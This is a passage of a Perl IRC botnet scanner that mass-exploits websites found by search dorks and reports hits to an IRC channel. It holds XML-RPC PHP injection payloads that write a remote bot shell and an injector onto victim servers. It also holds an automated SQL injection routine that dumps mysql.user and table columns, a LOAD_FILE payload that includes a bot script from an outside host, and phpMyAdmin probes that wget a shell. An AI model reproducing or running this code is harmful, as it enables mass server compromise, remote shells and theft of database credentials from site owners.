  1590.                                                         my $code =  "if(fwrite(fopen('".$pwd."/h4rd.php','w'),file_get_contents('".$botshell."'))) { echo'OWNAGE_SUCCESS';fwrite(fopen('".$pwd."/pb.php','w'),file_get_contents('".$injector."')); } elseif(copy('".$botshell."','".$pwd."/h4rd')) { echo'OWNAGE_SUCCESS';copy('".$injector."','".$pwd."/pb'); } else { echo'OWNAGE_FAILED'; } echo'_hihi';";
  1591.                                                         if(&injxmla($vuln,$code,$tpb) =~ /OWNAGE_SUCCESS/s) { &cmdxml_ok($vuln,$site,$chan,$engine,$xmllogo); }
  1592.                                                         &msg("$chan","$xmllogo 12(4@0$engine12)(7@4SYSTEM12)11 ".$vuln." 12(4@7".$sys."12)");
  1593.                                                 sleep(2); } exit; }
  1594.                                         }
  1595.                                 }
  1596.                                 elsif ($respc =~ /-OWNAGE-(.*)_Hihi_(.*)_hihi/s) { my $pwd = $1; my $sys = $2;
  1597.                                         if(&xml_uname_check($sys) eq "+") {
  1598.                                                 if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &injxmlb($vuln,$cdb,$tpa); sleep(2);
  1599.                                                         my $code =  "if(fwrite(fopen('".$pwd."/h4rd.php','w'),file_get_contents('".$botshell."'))) { echo'OWNAGE_SUCCESS';fwrite(fopen('".$pwd."/pb.php','w'),file_get_contents('".$injector."')); } elseif(copy('".$botshell."','".$pwd."/h4rd')) { echo'OWNAGE_SUCCESS';copy('".$injector."','".$pwd."/pb'); } else { echo'OWNAGE_FAILED'; }  echo'_hihi';";
  1600.                                                         if(&injxmlb($vuln,$code,$tpa) =~ /OWNAGE_SUCCESS/s) { &cmdxml_ok($vuln,$site,$chan,$engine,$xmllogo); }
  1601.                                                         &msg("$chan","$xmllogo 12(4@0$engine12)(7@4SYSTEM12)11 ".$vuln." 12(4@7".$sys."12)");
  1602.                                                 sleep(2); } exit; }
  1603.                                         }
  1604.                                 }
  1605.                                 elsif ($respd =~ /-OWNAGE-(.*)_Hihi_(.*)_hihi/s) { my $pwd = $1; my $sys = $2;
  1606.                                         if(&xml_uname_check($sys) eq "+") {
  1607.                                                 if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &injxmlb($vuln,$cdb,$tpb); sleep(2);
  1608.                                                         my $code =  "if(fwrite(fopen('".$pwd."/h4rd.php','w'),file_get_contents('".$botshell."'))) { echo'OWNAGE_SUCCESS';fwrite(fopen('".$pwd."/pb.php','w'),file_get_contents('".$injector."')); } elseif(copy('".$botshell."','".$pwd."/h4rd')) { echo'OWNAGE_SUCCESS';copy('".$injector."','".$pwd."/pb'); } else { echo'OWNAGE_FAILED'; }  echo'_hihi';";
  1609.                                                         if(&injxmlb($vuln,$code,$tpb) =~ /OWNAGE_SUCCESS/s) { &cmdxml_ok($vuln,$site,$chan,$engine,$xmllogo); }
  1610.                                                         &msg("$chan","$xmllogo 12(4@0$engine12)(7@4SYSTEM12)11 ".$vuln." 12(4@7".$sys."12)");
  1611.                                                 sleep(2); } exit; }
  1612.                                         }
  1613.                                 }
  1614.                                 elsif ($respe =~ /-OWNAGE-(.*)_Hihi_(.*)_hihi/s) { my $pwd = $1; my $sys = $2;
  1615.                                         if(&xml_uname_check($sys) eq "+") {
  1616.                                                 if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &injxmlc($vuln,$cdb,$tpa); sleep(2);
  1617.                                                         my $code =  "if(fwrite(fopen('".$pwd."/h4rd.php','w'),file_get_contents('".$botshell."'))) { echo'OWNAGE_SUCCESS';fwrite(fopen('".$pwd."/pb.php','w'),file_get_contents('".$injector."')); } elseif(copy('".$botshell."','".$pwd."/h4rd')) { echo'OWNAGE_SUCCESS';copy('".$injector."','".$pwd."/pb'); } else { echo'OWNAGE_FAILED'; } echo'_hihi';";
  1618.                                                         if(&injxmlc($vuln,$code,$tpa) =~ /OWNAGE_SUCCESS/s) { &cmdxml_ok($vuln,$site,$chan,$engine,$xmllogo); }
  1619.                                                         &msg("$chan","$xmllogo 12(4@0$engine12)(7@4SYSTEM12)11 ".$vuln." 12(4@7".$sys."12)");
  1620.                                                 sleep(2); } exit; }
  1621.                                         }
  1622.                                 }
  1623.                                 elsif ($respf =~ /-OWNAGE-(.*)_Hihi_(.*)_hihi/s) { my $pwd = $1; my $sys = $2;
  1624.                                         if(&xml_uname_check($sys) eq "+") {
  1625.                                                 if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &injxmlc($vuln,$cdb,$tpb); sleep(2);
  1626.                                                         my $code =  "if(fwrite(fopen('".$pwd."/h4rd.php','w'),file_get_contents('".$botshell."'))) { echo'OWNAGE_SUCCESS';fwrite(fopen('".$pwd."/pb.php','w'),file_get_contents('".$injector."')); } elseif(copy('".$botshell."','".$pwd."/h4rd')) { echo'OWNAGE_SUCCESS';copy('".$injector."','".$pwd."/pb'); } else { echo'OWNAGE_FAILED'; } echo'_hihi';";
  1627.                                                         if(&injxmlc($vuln,$code,$tpb) =~ /OWNAGE_SUCCESS/s) { &cmdxml_ok($vuln,$site,$chan,$engine,$xmllogo); }
  1628.                                                         &msg("$chan","$xmllogo 12(4@0$engine12)(7@4SYSTEM12)11 ".$vuln." 12(4@7".$sys."12)");
  1629.                                                 sleep(2); } exit; }
  1630.                                         }
  1631.                                 }
  1632.                                 elsif ($respg =~ /-OWNAGE-(.*)_Hihi_(.*)_hihi/s) { my $pwd = $1; my $sys = $2;
  1633.                                         if(&xml_uname_check($sys) eq "+") {
  1634.                                                 if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &injxmld($vuln,$cdb,$tpa); sleep(2);
  1635.                                                         my $code =  "if(fwrite(fopen('".$pwd."/h4rd.php','w'),file_get_contents('".$botshell."'))) { echo'OWNAGE_SUCCESS';fwrite(fopen('".$pwd."/pb.php','w'),file_get_contents('".$injector."')); } elseif(copy('".$botshell."','".$pwd."/h4rd')) { echo'OWNAGE_SUCCESS';copy('".$injector."','".$pwd."/pb'); } else { echo'OWNAGE_FAILED'; }  echo'_hihi';";
  1636.                                                         if(&injxmld($vuln,$code,$tpa) =~ /OWNAGE_SUCCESS/s) { &cmdxml_ok($vuln,$site,$chan,$engine,$xmllogo); }
  1637.                                                         &msg("$chan","$xmllogo 12(4@0$engine12)(7@4SYSTEM12)11 ".$vuln." 12(4@7".$sys."12)");
  1638.                                                 sleep(2); } exit; }
  1639.                                         }
  1640.                                 }
  1641.                                 elsif ($resph =~ /-OWNAGE-(.*)_Hihi_(.*)_hihi/s) { my $pwd = $1; my $sys = $2;
  1642.                                         if(&xml_uname_check($sys) eq "+") {
  1643.                                                 if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &injxmld($vuln,$cdb,$tpb); sleep(2);
  1644.                                                         my $code =  "if(fwrite(fopen('".$pwd."/h4rd.php','w'),file_get_contents('".$botshell."'))) { echo'OWNAGE_SUCCESS';fwrite(fopen('".$pwd."/pb.php','w'),file_get_contents('".$injector."')); } elseif(copy('".$botshell."','".$pwd."/h4rd')) { echo'OWNAGE_SUCCESS';copy('".$injector."','".$pwd."/pb'); } else { echo'OWNAGE_FAILED'; }  echo'_hihi';";
  1645.                                                         if(&injxmld($vuln,$code,$tpb) =~ /OWNAGE_SUCCESS/s) { &cmdxml_ok($vuln,$site,$chan,$engine,$xmllogo); }
  1646.                                                         &msg("$chan","$xmllogo 12(4@0$engine12)(7@4SYSTEM12)11 ".$vuln." 12(4@7".$sys."12)");
  1647.                                                 sleep(2); } exit; }
  1648.                                         }
  1649.                                 }
  1650.                                 else {
  1651.                                         &injxmla($vuln,$cdb,$tpb);
  1652.                                         &injxmlb($vuln,$cdb,$tpb);
  1653.                                         &injxmlc($vuln,$cdb,$tpb);
  1654.                                         &injxmld($vuln,$cdb,$tpb);
  1655.                                         if ($conf{xmlvln} == 1) { &msg("$chan","$xmllogo 12(4@0$engine12)(4@7VULN12)11 ".$vuln); }
  1656.                                 }
  1657.                         #}
  1658.                 }
  1659.         }
  1660. }
  1661. ###############################################################################################
  1662. sub xml_uname_check() {
  1663. my $sys = $_[0];
  1664.  
  1665. if ($sys eq "';echo php_uname();echo'") { $rtrn = "-"; }
  1666. elsif ($sys eq "; echo php_uname(); echo") { $rtrn = "-"; }
  1667. elsif ($sys eq "'; echo php_uname(); echo'") { $rtrn = "-"; }
  1668. elsif ($sys eq "\'; echo php_uname(); echo\'") { $rtrn = "-"; }
  1669. elsif ($sys eq "'; echo php_uname\(\); echo'") { $rtrn = "-"; }
  1670. elsif ($sys eq "%3B+echo+php_uname()%3B+echo") { $rtrn = "-"; }
  1671. elsif ($sys eq "&#39;; echo php_uname(); echo&#39;") { $rtrn = "-"; }
  1672. elsif ($sys eq "%27%3B+echo+php_uname()%3B+echo%27") { $rtrn = "-"; }
  1673. elsif ($sys eq "'%3b%20echo%20php_uname()%3b%20echo'") { $rtrn = "-"; }
  1674. elsif ($sys eq "%27%3Becho+php_uname%28%29%3Becho%27") { $rtrn = "-"; }
  1675. elsif ($sys eq "%27%3B+echo+php_uname%28%29%3B+echo%27") { $rtrn = "-"; }
  1676. elsif ($sys eq "'%3b%20echo%20php_uname%28%29%3b%20echo'") { $rtrn = "-"; }
  1677. elsif ($sys eq "%27%3B%20echo%20php_uname%28%29%3B%20echo%27") { $rtrn = "-"; }
  1678. elsif ($sys eq "%2527%253B%2520echo%2520php_uname%2528%2529%253B%2520echo%2527") { $rtrn = "-"; }
  1679. else { $rtrn = "+"; }
  1680.  
  1681. return $rtrn;
  1682. }
  1683.  
  1684. sub cmdxml_ok() {
  1685. my ($vuln,$site,$chan,$engine,$xmllogo) = @_;
  1686. if ($vuln =~ /http:\/\/(.*)\//s) { my $urover = $1;
  1687.         my $dar = "http://".$urover."/h4rd.php";
  1688.         my $der = "http://".$urover."/pb.php";
  1689.         my $checka = &get_content($dar);
  1690.         if ($checka =~ /0wn3d/ ) { &info_main($dar,$chan,$engine,$xmllogo); sleep(1); &get_content($der); }
  1691. } else {
  1692.         my $dor = "http://".$site."/h4rd.php";
  1693.         my $dur = "http://".$site."/pb.php";
  1694.         my $checkb = &get_content($dor);
  1695.         if ($checkb =~ /0wn3d/ ) { &info_main($dor,$chan,$engine,$xmllogo); sleep(1); &get_content($dur); }
  1696. }
  1697. }
  1698.  
  1699. sub rstring
  1700. {
  1701. my $length_of_randomstring=shift;
  1702. my @chars=('a'..'z','A'..'Z','0'..'9');
  1703. my $random_string;
  1704. foreach (1..$length_of_randomstring) {
  1705.         $random_string.=$chars[rand @chars];
  1706. }
  1707. return $random_string;
  1708. }
  1709.  
  1710. my $rand0 = &rstring(15); my $rand1 = &rstring(15);
  1711. my $rand2 = &rstring(15); my $rand3 = &rstring(15);
  1712. my $rand4 = &rstring(15); my $rand5 = &rstring(15);
  1713. my $rand6 = &rstring(15); my $rand7 = &rstring(15);
  1714. my $rand8 = &rstring(15); my $rand9 = &rstring(15);
  1715. my $rand10 = &rstring(15);
  1716.  
  1717. ###############################################################################################
  1718. sub injxmla() {
  1719. my ($url,$code,$type) = @_;
  1720. my $userAgent = LWP::UserAgent->new(agent => $uagent);
  1721. $userAgent->timeout(20);
  1722.  
  1723.         $exp = "<?xml version=\"1.0\"?>";
  1724.         $exp .= "<methodCall>";
  1725.         $exp .= "<methodName>".$rand6."</methodName>";
  1726.         $exp .= "<params><param>";
  1727.         $exp .= "<value>".$rand7."<base64>')); $code exit;";
  1728.         $exp .= "</param></params>";
  1729.         $exp .= "</methodCall>";
  1730.        
  1731. my $l = length($exp);
  1732. my $res = $userAgent->request(POST $url,Content_Type => $type,Content_Length => $l,Content => $exp);
  1733. return $res->content;
  1734. }
  1735. #-----------------------------------------------------
  1736. sub injxmlb() {
  1737. my ($url,$code,$type) = @_;
  1738. my $userAgent = LWP::UserAgent->new(agent => $uagent);
  1739. $userAgent->timeout(20);
  1740.  
  1741.         $exp = "<?xml version=\"1.0\"?>";
  1742.         $exp .= "<methodCall>";
  1743.         $exp .= "<methodName>".$rand2."</methodName>";
  1744.         $exp .= "<params><param>";
  1745.         $exp .= "<value>".$rand3."<name>".$rand4."','')); $code exit;/*</name></value>";
  1746.         $exp .= "</param></params>";
  1747.         $exp .= "</methodCall>";
  1748.  
  1749. my $l = length($exp);
  1750. my $res = $userAgent->request(POST $url,Content_Type => $type,Content_Length => $l,Content => $exp);
  1751. return $res->content;
  1752. }
  1753. #-----------------------------------------------------
  1754. sub injxmlc() {
  1755. my ($url,$code,$type) = @_;
  1756. my $userAgent = LWP::UserAgent->new(agent => $uagent);
  1757. $userAgent->timeout(20);
  1758.  
  1759.     $exp = "<?xml version=\"1.0\"?>";
  1760.     $exp .= "<methodCall>";
  1761.     $exp .= "<methodName>".$rand5."</methodName>";
  1762.     $exp .= "<params><param>";
  1763.     $exp .= "<name>".$rand6."'); $code exit;//</name>";
  1764.     $exp .= "<value>".$rand7."</value>";
  1765.     $exp .= "</param></params>";
  1766.     $exp .= "</methodCall>";
  1767.        
  1768. my $res = $userAgent->request(POST $url,Content_Type => $type,Content => $exp);
  1769. return $res->content;
  1770. }
  1771. #-----------------------------------------------------
  1772. sub injxmld() {
  1773. my ($url,$code,$type) = @_;
  1774. my $userAgent = LWP::UserAgent->new(agent => $uagent);
  1775. $userAgent->timeout(20);
  1776.  
  1777.         $exp = "<?xml version=\"1.0\"?>";
  1778.         $exp .= "<methodCall>";
  1779.         $exp .= "<methodName>".$rand8."</methodName>";
  1780.         $exp .= "<params><param>";
  1781.         $exp .= "<value><string>1</string></value>";
  1782.         $exp .= "</param><param>";
  1783.         $exp .= "<value><string>1</string></value>";
  1784.         $exp .= "</param><param>";
  1785.         $exp .= "<value><string>1</string></value>";
  1786.         $exp .= "</param><param>";
  1787.         $exp .= "<value><string>1</string></value>";
  1788.         $exp .= "</param><param>";
  1789.         $exp .= "<value>".$rand9."<name>".$rand10."','')); $code die; /*</name></value>";
  1790.         $exp .= "</param></params>";
  1791.         $exp .= "</methodCall>";
  1792.  
  1793. my $res = $userAgent->request(POST $url,Content_Type => $type,Content => $exp);
  1794. return $res->content;
  1795. }
  1796. ######################## SQL
  1797. sub sql() {
  1798.         my ($chan,$bug,$dork,$engine) = @_;
  1799.     my $count = 0;
  1800.     my @list = &search_engine($chan,$bug,$dork,$engine,$sqllogo);
  1801.     my $num = scalar(@list);
  1802.     if ($num > 0) {
  1803.         foreach my $site (@list) {
  1804.             $count++;
  1805.             if ($count == $num-1) { if ($conf{ssdone} == 1) { &msg("$chan","$sqllogo 12(4@0$engine12) 7==14F7=15I7=0N7=0I7=14S7=14H7== "); } }
  1806.             my $test = "http://".$site.$bug."'";
  1807.             my $vuln = "http://".$site."12".$bug;
  1808.                         my $sqlsite = "http://".$site.$bug;
  1809.             my $html = &get_content($test);
  1810.                         if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else {
  1811.             if ($html =~ m/You have an error in your SQL syntax/i || $html =~ m/Query failed/i || $html =~ m/SQL query failed/i ) {
  1812.                 &sqlbrute($sqlsite,$chan,$engine);}
  1813.             elsif ($html =~ m/ODBC SQL Server Driver/i || $html =~ m/Unclosed quotation mark/i || $html =~ m/Microsoft OLE DB Provider for/i ) {
  1814.                 &msg("$chan","0,1$sqllogo(4@0$engine15)15(13@12MsSQL15)4 ".$vuln);&sqlbrute($sqlsite,$chan,$engine);}
  1815.             elsif ($html =~ m/Microsoft JET Database/i || $html =~ m/ODBC Microsoft Access Driver/i || $html =~ m/Microsoft OLE DB Provider for Oracle/i ) {
  1816.                 &msg("$chan","0,1$sqllogo(4@0$engine15)15(13@12MsAccess15)4 ".$vuln);&sqlbrute($sqlsite,$chan,$engine);}
  1817.             elsif ($html =~ m/mysql_/i || $html =~ m/Division by zero in/i || $html =~ m/mysql_fetch_array/i ) {
  1818.                 &sqlbrute($sqlsite,$chan,$engine);}
  1819.             } exit; sleep(2); }
  1820.         }
  1821.     }
  1822. }
  1823. sub sqlbrute() {
  1824.                         my ($situs,$chan,$engine) = @_;
  1825.                         my $columns=45;
  1826. my $cfin.="--";
  1827. my $cmn.= "+";
  1828. for ($column = 0 ; $column < $columns ; $column ++)
  1829.         {
  1830.         $union.=','.$column;
  1831.         $inyection.=','."0x6c6f67696e70776e7a";
  1832.     if ($column == 0)
  1833.       {
  1834.                   $inyection = '';
  1835.           $union = '';
  1836.       }
  1837.     $sql=$situs."-1".$cmn."union".$cmn."select".$cmn."0x6c6f67696e70776e7a".$inyection.$cfin;
  1838.     $response=get($sql);
  1839.     if($response =~ /loginpwnz/)
  1840.                 {
  1841.          $column ++;
  1842.          $sql=$situs."-1".$cmn."union".$cmn."select".$cmn."0".$union.$cfin;
  1843.                  &msg("$chan","0,1$sqllogo(4@0$engine15)15(4@12SQL15)3 $sql  ");
  1844.          $sql=$situs."-1".$cmn."union".$cmn."select".$cmn."0x6c6f67696e70776e7a".$inyection.$cmn."from".$cmn."information_schema.tables".$cfin;
  1845.          $response=get($sql)or die("[-] Impossible to get Information_Schema\n");
  1846.          if($response =~ /loginpwnz/)
  1847.                 {
  1848.                 $sql=$situs."-1".$cmn."union".$cmn."select".$cmn."0".$union.$cmn."from".$cmn."information_schema.tables".$cfin;
  1849.                         &msg("$chan","0,1$sqllogo(4@0$engine15)15(4@12SQL15)(4@14INFO_SCHEMA15)3 $sql  ");
  1850.                 }
  1851.          $sql=$situs."-1".$cmn."union".$cmn."select".$cmn."0x6c6f67696e70776e7a".$inyection.$cmn."from".$cmn."mysql.user".$cfin;
  1852.          $response=get($sql)or die("[-] Impossible to get MySQL.User\n");
  1853.          if($response =~ /loginpwnz/)
  1854.                 {
  1855.                 $sql=$situs."-1".$cmn."union".$cmn."select".$cmn."0".$union.$cmn."from".$cmn."mysql.user".$cfin;
  1856.                         &msg("$chan","0,1$sqllogo(4@0$engine15)15(4@12SQL15)(4@14USER15)3 $sql  ");
  1857.                 }
  1858.          else
  1859.                 {
  1860.                 }
  1861.         while ($loadcont < $column-1)
  1862.            {
  1863.                 $loadfile.=','.'load_file(0x2f70726f632f73656c662f656e7669726f6e2530303030696e636c7564652822687474703a2f2f626c6f672e737369732e6564752e766e2f2e6d6f64732f70626f742e7478743f22293b)';
  1864.                 $loadcont++;
  1865.            }
  1866.            $sql=$situs."-1".$cmn."union".$cmn."select".$cmn."load_file(0x2f70726f632f73656c662f656e7669726f6e2530303030696e636c7564652822687474703a2f2f626c6f672e737369732e6564752e766e2f2e6d6f64732f70626f742e7478743f22293b)".$loadfile.$cfin;
  1867.           $response=get($sql)or die("[-] Impossible to inject LOAD_FILE\n");
  1868.          if($response =~ /apache/)
  1869.                 {
  1870.                         &msg("$chan","0,1$sqllogo(4@0$engine15)15(4@12SQL15)(4@14Load File15)3 $sql  ");
  1871.                         }
  1872.          else
  1873.                 {
  1874.                 }
  1875.                   foreach $tabla(@tabele)
  1876.                 {
  1877.                   chomp($tabla);
  1878.                   $sql=$situs."-1".$cmn."union".$cmn."select".$cmn."0x6c6f67696e70776e7a".$inyection.$cmn."from".$cmn.$tabla.$cfin;
  1879.                                  $response=get($sql)or die("[-] Impossible to get tables\n");
  1880.                   if($response =~ /loginpwnz/)
  1881.                     {
  1882.                     $sql=$situs."-1".$cmn."union".$cmn."select".$cmn."0".$union.$cmn."from".$cmn.$tabla.$cfin;
  1883.                                         &msg("$chan","0,1$sqllogo(4@0$engine15)15(4@12SQL15)(4@14Tabel15)3 $sql  ");
  1884.                                         &tabelka($situs,$tabla,$chan,$engine);
  1885.                     }
  1886.                 }
  1887.                 }
  1888.         }                      
  1889. }
  1890.  
  1891. sub tabelka() {
  1892.                         my ($situs,$tabla,$chan,$engine) = @_;
  1893.                         my $cfin.="--";
  1894.                         my $cmn.= "+";
  1895.             chomp($tabla);
  1896.             foreach $columna(@kolumny)
  1897.             {
  1898.              chomp($columna);
  1899.              $sql=$situs."-1".$cmn."union".$cmn."select".$cmn."concat(0x6c6f67696e70776e7a,0x3a,$columna)".$inyection.$cmn."from".$cmn.$tabla.$cfin;
  1900.              $response=get($sql)or die("[-] Impossible to get columns\n");
  1901.              if ($response =~ /loginpwnz/)
  1902.                 {
  1903.                                 &msg("$chan","0,1$sqllogo(4@0$engine15)15(4@12SQL15)(7@14SQLi Vuln14)3 $situs 14(4@14Kolom14)3 $columna 14(4@14Tabel14)3 $tabla  ");
  1904.                 }
  1905.             }
  1906.        
  1907. }
  1908.  
  1909. ######################## Cpanel
  1910. sub cpanel() {
  1911.         my ($chan,$bug,$dork,$engine) = @_;
  1912.     my $count = 0;
  1913.     my @list = &search_engine($chan,$bug,$dork,$engine,$cpanlogo);
  1914.     my $num = scalar(@list);
  1915.     if ($num > 0) {
  1916.         foreach my $site (@list) {
  1917.             $count++;
  1918.          if ($count == $num-1) { if ($conf{ssdone} == 1) { &msg("$chan","$cpanlogo 12(4@0$engine12) 4==14F4=15I4=0N4=0I4=15S4=14H4== "); } }
  1919.             my $test = "http://".$site.$bug;
  1920.                         my $zine = "http://".$site."admin/content.php?act=tambahuser";
  1921.             my $re    = &get_content($zine);
  1922.            if ($re =~ /<input type=text name=nama_lengkap size=30>/i ){
  1923.                         &msg("$chan","$cpanlogo 12(4@0$engine12)(4@8OK4]9 http://".$site."4admin/content.php?act=tambahuser");sleep(2);
  1924.             }
  1925.                 }
  1926.     }
  1927. }
  1928. sub cpanel2() {
  1929.         my ($chan,$bug,$dork,$engine) = @_;
  1930.     my $count = 0;     
  1931.     my @list = &search_engine($chan,$bug,$dork,$engine,$cpanlogo);
  1932.     my $num = scalar(@list);
  1933.     if ($num > 0) {
  1934.         foreach my $site (@list) {
  1935.             $count++;
  1936.          if ($count == $num-1) { if ($conf{ssdone} == 1) { &msg("$chan","$cpanlogo 12(4@0$engine12) 4==14F4=15I4=0N4=0I4=15S4=14H4== "); } }
  1937.             my $test = "http://".$site.$bug;
  1938.                         my $zine = "http://".$site."admin/content.php?module=user";
  1939.             my $re    = &get_content($zine);
  1940.            if ($re =~ /<input type=submit value='Tambah User'>/i ){
  1941.                         &msg("$chan","$cpanlogo 12(4@0$engine12)(4@8OK4]9 http://".$site."4admin/content.php?act=tambahuser");sleep(2);
  1942.             }
  1943.                 }
  1944.     }
  1945. }
  1946.  
  1947. ######################## PHPmyadmin
  1948. sub adm() {
  1949.         my ($chan,$bug,$dork,$engine) = @_;
  1950.     my $count = 0;
  1951.     my @list = &search_engine($chan,$bug,$dork,$engine,$admlogo);
  1952.     my $num = scalar(@list);
  1953.     if ($num > 0) {
  1954.         foreach my $site (@list) {
  1955.             $count++;
  1956.             if ($count == $num-1) { if ($conf{ssdone} == 1) { &msg("$chan","$admlogo 12(4@0$engine12) 11==14F11=15I11=0N11=0I11=15S11=14H11== "); } }
  1957.            
  1958.                         if(get_content("http://".$site."phpMyAdmin/config/config.inc.php?c=echo%200WN4GE;id;wget%20".$injurl."sh.txt%20-O%20h4rd.php") =~ /$adm_output/ ){ my $vuln = "phpMyAdmin/config/config.inc.php"; &adm_xpl($vuln,$chan,$site,$engine); }
  1959.                         elsif(get_content("http://".$site."phpmyadmin/config/config.inc.php?c=echo%200WN4GE;id;wget%20".$injurl."sh.txt%20-O%20h4rd.php") =~ /$adm_output/ ){ my $vuln = "phpmyadmin/config/config.inc.php"; &adm_xpl($vuln,$chan,$site,$engine); }
  1960.                         elsif(get_content("http://".$site."PHPMYADMIN/config/config.inc.php?c=echo%200WN4GE;id;wget%20".$injurl."sh.txt%20-O%20h4rd.php") =~ /$adm_output/ ){ my $vuln = "PHPMYADMIN/config/config.inc.php"; &adm_xpl($vuln,$chan,$site,$engine); }
  1961.                         elsif(get_content("http://".$site."PMA/config/config.inc.php?c=echo%200WN4GE;id;wget%20".$injurl."sh.txt%20-O%20h4rd.php") =~ /$adm_output/ ){ my $vuln = "PMA/config/config.inc.php"; &adm_xpl($vuln,$chan,$site,$engine); }
  1962.                         elsif(get_content("http://".$site."pma/config/config.inc.php?c=echo%200WN4GE;id;wget%20".$injurl."sh.txt%20-O%20h4rd.php") =~ /$adm_output/ ){ my $vuln = "pma/config/config.inc.php"; &adm_xpl($vuln,$chan,$site,$engine); }
  1963.                         elsif(get_content("http://".$site."admin/config/config.inc.php?c=echo%200WN4GE;id;wget%20".$injurl."sh.txt%20-O%20h4rd.php") =~ /$adm_output/ ){ my $vuln = "admin/config/config.inc.php"; &adm_xpl($vuln,$chan,$site,$engine); }
  1964.                         elsif(get_content("http://".$site."dbadmin/config/config.inc.php?c=echo%200WN4GE;id;wget%20".$injurl."sh.txt%20-O%20h4rd.php") =~ /$adm_output/ ){ my $vuln = "dbadmin/config/config.inc.php"; &adm_xpl($vuln,$chan,$site,$engine); }
  1965.                         elsif(get_content("http://".$site."mysql/config/config.inc.php?c=echo%200WN4GE;id;wget%20".$injurl."sh.txt%20-O%20h4rd.php") =~ /$adm_output/ ){ my $vuln = "mysql/config/config.inc.php"; &adm_xpl($vuln,$chan,$site,$engine); }
  1966.                         elsif(get_content("http://".$site."myadmin/config/config.inc.php?c=echo%200WN4GE;id;wget%20".$injurl."sh.txt%20-O%20h4rd.php") =~ /$adm_output/ ){ my $vuln = "myadmin/config/config.inc.php"; &adm_xpl($vuln,$chan,$site,$engine); }
  1967.                         elsif(get_content("http://".$site."phpmyadmin2/config/config.inc.php?c=echo%200WN4GE;id;wget%20".$injurl."sh.txt%20-O%20h4rd.php") =~ /$adm_output/ ){ my $vuln = "phpmyadmin2/config/config.inc.php"; &adm_xpl($vuln,$chan,$site,$engine); }
  1968.                         elsif(get_content("http://".$site."phpMyAdmin2/config/config.inc.php?c=echo%200WN4GE;id;wget%20".$injurl."sh.txt%20-O%20h4rd.php") =~ /$adm_output/ ){ my $vuln = "phpMyAdmin2/config/config.inc.php"; &adm_xpl($vuln,$chan,$site,$engine); }
  1969.                         elsif(get_content("http://".$site."phpMyAdmin-2/config/config.inc.php?c=echo%200WN4GE;id;wget%20".$injurl."sh.txt%20-O%20h4rd.php") =~ /$adm_output/ ){ my $vuln = "phpMyAdmin-2/config/config.inc.php"; &adm_xpl($vuln,$chan,$site,$engine); }
  1970.                         elsif(get_content("http://".$site."php-my-admin/config/config.inc.php?c=echo%200WN4GE;id;wget%20".$injurl."sh.txt%20-O%20h4rd.php") =~ /$adm_output/ ){ my $vuln = "php-my-admin/config/config.inc.php"; &adm_xpl($vuln,$chan,$site,$engine); }
  1971.                         elsif(get_content("http://".$site."sqlmanager/config/config.inc.php?c=echo%200WN4GE;id;wget%20".$injurl."sh.txt%20-O%20h4rd.php") =~ /$adm_output/ ){ my $vuln = "sqlmanager/config/config.inc.php"; &adm_xpl($vuln,$chan,$site,$engine); }
  1972.                         elsif(get_content("http://".$site."mysqlmanager/config/config.inc.php?c=echo%200WN4GE;id;wget%20".$injurl."sh.txt%20-O%20h4rd.php") =~ /$adm_output/ ){ my $vuln = "mysqlmanager/config/config.inc.php"; &adm_xpl($vuln,$chan,$site,$engine); }
  1973.                         elsif(get_content("http://".$site."phpmanager/config/config.inc.php?c=echo%200WN4GE;id;wget%20".$injurl."sh.txt%20-O%20h4rd.php") =~ /$adm_output/ ){ my $vuln = "phpmanager/config/config.inc.php"; &adm_xpl($vuln,$chan,$site,$engine); }
  1974.                         elsif(get_content("http://".$site."php-myadmin/config/config.inc.php?c=echo%200WN4GE;id;wget%20".$injurl."sh.txt%20-O%20h4rd.php") =~ /$adm_output/ ){ my $vuln = "php-myadmin/config/config.inc.php"; &adm_xpl($vuln,$chan,$site,$engine); }
  1975.                         elsif(get_content("http://".$site."phpmy-admin/config/config.inc.php?c=echo%200WN4GE;id;wget%20".$injurl."sh.txt%20-O%20h4rd.php") =~ /$adm_output/ ){ my $vuln = "phpmy-admin/config/config.inc.php"; &adm_xpl($vuln,$chan,$site,$engine); }
  1976.                         elsif(get_content("http://".$site."webadmin/config/config.inc.php?c=echo%200WN4GE;id;wget%20".$injurl."sh.txt%20-O%20h4rd.php") =~ /$adm_output/ ){ my $vuln = "webadmin/config/config.inc.php"; &adm_xpl($vuln,$chan,$site,$engine); }
  1977.                         elsif(get_content("http://".$site."sqlweb/config/config.inc.php?c=echo%200WN4GE;id;wget%20".$injurl."sh.txt%20-O%20h4rd.php") =~ /$adm_output/ ){ my $vuln = "sqlweb/config/config.inc.php"; &adm_xpl($vuln,$chan,$site,$engine); }
  1978.                         elsif(get_content("http://".$site."phppgadmin/config/config.inc.php?c=echo%200WN4GE;id;wget%20".$injurl."sh.txt%20-O%20h4rd.php") =~ /$adm_output/ ){ my $vuln = "phppgadmin/config/config.inc.php"; &adm_xpl($vuln,$chan,$site,$engine); }
  1979.                         elsif(get_content("http://".$site."websql/config/config.inc.php?c=echo%200WN4GE;id;wget%20".$injurl."sh.txt%20-O%20h4rd.php") =~ /$adm_output/ ){ my $vuln = "websql/config/config.inc.php"; &adm_xpl($vuln,$chan,$site,$engine); }
  1980.                         elsif(get_content("http://".$site."webdb/config/config.inc.php?c=echo%200WN4GE;id;wget%20".$injurl."sh.txt%20-O%20h4rd.php") =~ /$adm_output/ ){ my $vuln = "webdb/config/config.inc.php"; &adm_xpl($vuln,$chan,$site,$engine); }
  1981.                         elsif(get_content("http://".$site."mysqladmin/config/config.inc.php?c=echo%200WN4GE;id;wget%20".$injurl."sh.txt%20-O%20h4rd.php") =~ /$adm_output/ ){ my $vuln = "mysqladmin/config/config.inc.php"; &adm_xpl($vuln,$chan,$site,$engine); }
  1982.                         elsif(get_content("http://".$site."mysql-admin/config/config.inc.php?c=echo%200WN4GE;id;wget%20".$injurl."sh.txt%20-O%20h4rd.php") =~ /$adm_output/ ){ my $vuln = "webmail/config/config.inc.php"; &adm_xpl($vuln,$chan,$site,$engine); }
  1983.                 }
  1984.     }
  1985. }
  1986.  
  1987. sub adm_xpl() {
